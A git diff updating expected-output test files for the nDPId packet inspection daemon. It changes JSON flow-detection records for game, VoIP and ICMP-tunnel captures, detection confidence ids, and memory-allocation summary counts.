+00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"i3d.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1643575387216,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643575387216,"pkt":"eJS0JASgYDjgxTWgCABFAABm+ssAAH8RUNzAqAJk1aNXL\/P9w1QAUnF1AAEARgADz6gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFrA="} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"i3d.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643575387216,"flow_last_seen":1643575387216,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643575387216,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":62461,"dst_port":50004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} +00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"i3d.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1643575387247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643575387247,"pkt":"YDjgxTWgeJS0JASgCABFAABmnUdAADsRsmDVo1cvwKgCZMNU8\/0AUjHHAAIARgADz6g5MC4xODYuMTMyLjEzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8\/0="} +02091{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"i3d.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1643575387252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1257,"pkt_l4_len":1223,"thread_ts_msec":1643575387252,"pkt":"eJS0JASgYDjgxTWgCABFAATb+uoAAH8RTEjAqAJk1aNXL\/P9w1QEx3hNkGfzne7YC1wAA8+pvt4AA5jc4dEa3vvziY9kcYPpMt4WdlkUbbeM1oWfSiFwJ9Gt+KvRAAcj3KEWDH6RJJAvuu8Qe4jAgkSp87\/DPCUHEowkb00jtgL68gOggJbq2bOUhU2709PN9NMl14f2gdqo3P7LaeUZ6Kczo1NGb4oR5Rq2JsRtxDejeKEKDNANZ0U7emSTSRs6ze2VDwnZjgXLQcV\/RG3b3aa1WG4gRrNgiy4JzMDV9nuZ848z1UJMG3uWkPJOFWPICxWueRoneHKFK71fBj8nl8Pw9rKumSc6DGP6DDmoThvXOi2Gu+PMh+Chr\/Ogov2r9rE2SRUNXKaTvP14hgG8+MQvAETw\/nePwdZrcsV6Hby\/+MyeTmwsSkXzlPPFayK8FVbY8Kc6+koI7eQEur23CgQz6J3NB3m3LU3v\/a\/\/8uTTDZdWng1y5Vw98wu3YkDw4ru2Y2n\/XwrHIq2qK2FZd6ofJO\/qV\/PPjKC7yN5IuzD310YeflJWyvIIYXt6\/u+mUvYvfJNh4iZTOK20vR+L2dBIiUwFjdEYKmc0FPIODnVQGBcSfv1LCXsHlNZr+XStcvrLr98HYhY0meFs55ERmSx\/fmSBANwJGTM3hIUtN0\/gpzjolNmCQABdt1mQ3NEd9bvyhQ1hITnmxmd+fa2swXfAAq\/h\/JOp\/441cujVp12+CyIOAjMFVniOT3CYOJj6aEi8Zd51GJuNCTW5DlE8jRTJ\/q82Dnob5QYUYF0wwf1JY9p5\/tIaxvJXXL16NjTIGbmIZhRb9FQ8LeDpGie61jCVh\/ukyAu5ikecrOqWjWJ50QwLPhDeh5E+wQ25lQZTIE70OBy12IR\/hqComnchdnvyKfx4YfAHO5vxwN9Jrl2Jof9LDKuDe\/8YtUEUzBojCMK1kwtxVloVQfjp\/mZVJaA1EDZA3PIOG91D1LORdGlkv4AYBtPgAsohRYIAhtjvccy2FjTA3ungXQP6sBv3L+0sx\/071T7RcY4Yh\/wHXUbWmYqbEPVepVfBCp7jzrM0aZwyNsoZBWdq\/OgTcL7tcRja5\/BLQTcEASCB4wDq1WyQldx7RAH4BHaZmdWLHfi2i2Zjx2++DbCrIx+47dpI1\/BpGCcjDClmGcw3eQVsx2jxc4o1RJyqXAPCPVnYXTpQE7Tp1KiwN4RmxSPlODBHmVgPEdYGbLXsNrYGmbV\/gA9n6VjbUEfxHxPpwTjQZ1I8ZUwjRmitozUbQ5\/89EO2tJjhKmTnf1ss0Ec0c+9820t9ZwwG2eAYn6SgYdm5xKZPHzMm1pfbxYVv3HW+rXVcZuz65NVbZAO7XV+k2KjLbHSr3MCKmGxNEvKctjm0V\/gIp2yUki+iEKldLM\/mMJVXjptSYD\/I9+O+W8SdRs3WiBSA9Q1At0qQj8\/nEz6muJbWUSP4z07zGu0eaYbbxvanpEVEjgXukyVL8rHS98M24vJqdC2NmRtMC3vWE9swu6e3KNhXTdPUDxqYDED7pG6UmEOIRKtI65rrIFGVB\/p7AsMMo2QWP0q+NXJWJks0PQimoB1PR2dTSwamDuimqPdrTUyw5hwIWP2nZHy1IWOZvKYnAH+Ct\/4EBFBHUuLc+Y+IS2oWiF6+qyWA"} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"i3d.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1643575387216,"flow_last_seen":1643575387266,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":1216,"flow_tot_l4_payload_len":15953,"flow_avg_l4_payload_len":1063,"midstream":0,"thread_ts_msec":1643575387266,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":62461,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"i3d.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1643574967215,"flow_last_seen":1643574967460,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":1210,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1643575387266,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":62620,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} +00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":60,"source":"i3d.pcap","alias":"nDPId-test","packets-captured":60,"packets-processed":60,"total-skipped-flows":0,"total-l4-payload-len":33972,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1643575387266} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 60/60 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 33972 bytes +~~ total detected protocols..: 4 +~~ total active/idle flows...: 4/4 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6007997 bytes +~~ total memory freed........: 6007997 bytes +~~ total allocations/frees...: 120948/120948 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 459 chars +~~ json string max len.......: 2096 chars +~~ json string avg len.......: 1240 chars diff --git a/test/results/iax.pcap.out b/test/results/iax.pcap.out index 3c50173ba..4f2e8a0ef 100644 --- a/test/results/iax.pcap.out +++ b/test/results/iax.pcap.out @@ -2,10 +2,10 @@ 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"iax.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1123840005963} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1123840005963,"flow_last_seen":1123840005963,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1123840005963,"l3_proto":"ip4","src_ip":"82.110.36.84","dst_ip":"192.168.2.120","src_port":4569,"dst_port":4566,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1123840005963,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1123840005963,"pkt":"AMDwli5rAOCBJ2JwCABFEABeAABAAEARAJ1SbiRUwKgCeBHZEdYASpLMgAQAAAAAAAEAAAYBCwIAAgEMNDQyMDg4MjA1MTU1Agw0NDc3ODIyNjc5NDkEAAoCZW7\/BAAAAAIMAgAAHwQLDFXW"} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1123840005963,"flow_last_seen":1123840005963,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1123840005963,"l3_proto":"ip4","src_ip":"82.110.36.84","dst_ip":"192.168.2.120","src_port":4569,"dst_port":4566,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IAX","breed":"Acceptable","category":"VoIP"}} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1123840005963,"flow_last_seen":1123840005963,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1123840005963,"l3_proto":"ip4","src_ip":"82.110.36.84","dst_ip":"192.168.2.120","src_port":4569,"dst_port":4566,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IAX","breed":"Acceptable","category":"VoIP"}} 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1123840005966,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1123840005966,"pkt":"AOCBJ2JwAMDwli5rCABFAAAoV7tAAEARqSfAqAJ4Um4kVBHWEdkAFBwTgBcABAAAAAEAAQYE"} 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1123840005971,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1123840005971,"pkt":"AOCBJ2JwAMDwli5rCABFAAAoV71AAEARqSXAqAJ4Um4kVBHWEdkAFBwJgBcABAAAAAgAAQYH"} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":50,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1123840005963,"flow_last_seen":1123840006489,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":7054,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1123840006489,"l3_proto":"ip4","src_ip":"82.110.36.84","dst_ip":"192.168.2.120","src_port":4569,"dst_port":4566,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IAX","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":50,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1123840005963,"flow_last_seen":1123840006489,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":7054,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1123840006489,"l3_proto":"ip4","src_ip":"82.110.36.84","dst_ip":"192.168.2.120","src_port":4569,"dst_port":4566,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IAX","breed":"Acceptable","category":"VoIP"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":50,"source":"iax.pcap","alias":"nDPId-test","packets-captured":50,"packets-processed":50,"total-skipped-flows":0,"total-l4-payload-len":7054,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1123840006489} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 50/50 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870893 bytes -~~ total memory freed........: 5870893 bytes -~~ total allocations/frees...: 118164/118164 +~~ total memory allocated....: 6004527 bytes +~~ total memory freed........: 6004527 bytes +~~ total allocations/frees...: 120926/120926 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 448 chars ~~ json string max len.......: 679 chars diff --git a/test/results/icmp-tunnel.pcap.out b/test/results/icmp-tunnel.pcap.out index 6a367898a..3258fe7b7 100644 --- a/test/results/icmp-tunnel.pcap.out +++ b/test/results/icmp-tunnel.pcap.out @@ -2,19 +2,19 @@ 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"icmp-tunnel.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1360227866458} 00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1360227866459,"flow_last_seen":1360227866459,"flow_idle_time":140000,"flow_min_l4_payload_len":92,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":92,"midstream":0,"thread_ts_msec":1360227866459,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1360227866459,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1360227866459,"pkt":"AAwpy+OCAAwpzwzBCABFAABwAABAAEABhDTAqJqDwKiahAgAAAD+\/wAARQAAVAAAQABAASPpCl8BAQpfAQIIAFvrPQgAAS1uE1EtSQYACAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1360227866459,"flow_last_seen":1360227866459,"flow_idle_time":140000,"flow_min_l4_payload_len":92,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":92,"midstream":0,"thread_ts_msec":1360227866459,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.703333} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1360227866459,"flow_last_seen":1360227866459,"flow_idle_time":140000,"flow_min_l4_payload_len":92,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":92,"midstream":0,"thread_ts_msec":1360227866459,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.703333} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1360227867458,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1360227867458,"pkt":"AAwpy+OCAAwpzwzBCABFAABwAABAAEABhDTAqJqDwKiahAgAAAD+\/wAARQAAVAAAQABAASPpCl8BAQpfAQIIAH3tPQgAAi5uE1EKRgYACAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3"} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1360227868458,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1360227868458,"pkt":"AAwpy+OCAAwpzwzBCABFAABwAABAAEABhDTAqJqDwKiahAgAAAD+\/wAARQAAVAAAQABAASPpCl8BAQpfAQIIAD\/sPQgAAy9uE1FHRgYACAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3"} -00785{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":160,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":147,"flow_first_seen":1360227866459,"flow_last_seen":1360228057029,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":17193,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1360228057029,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":214,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":187,"flow_first_seen":1360227866459,"flow_last_seen":1360228178094,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1036,"flow_tot_l4_payload_len":30249,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1360228178094,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":257,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":220,"flow_first_seen":1360227866459,"flow_last_seen":1360228298215,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":37116,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1360228298215,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":294,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":247,"flow_first_seen":1360227866459,"flow_last_seen":1360228422618,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":40240,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1360228422618,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00785{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":160,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":147,"flow_first_seen":1360227866459,"flow_last_seen":1360228057029,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":17193,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1360228057029,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":214,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":187,"flow_first_seen":1360227866459,"flow_last_seen":1360228178094,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1036,"flow_tot_l4_payload_len":30249,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1360228178094,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":257,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":220,"flow_first_seen":1360227866459,"flow_last_seen":1360228298215,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":37116,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1360228298215,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":294,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":247,"flow_first_seen":1360227866459,"flow_last_seen":1360228422618,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":40240,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1360228422618,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":298,"source":"icmp-tunnel.pcap","alias":"nDPId-test","packets-captured":298,"packets-processed":251,"total-skipped-flows":0,"total-l4-payload-len":40400,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":4,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":1360228467662} -00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":400,"flow_first_seen":1360227866459,"flow_last_seen":1360228543914,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":59886,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1360228543914,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":525,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":460,"flow_first_seen":1360227866459,"flow_last_seen":1360228682488,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":67252,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1360228682488,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 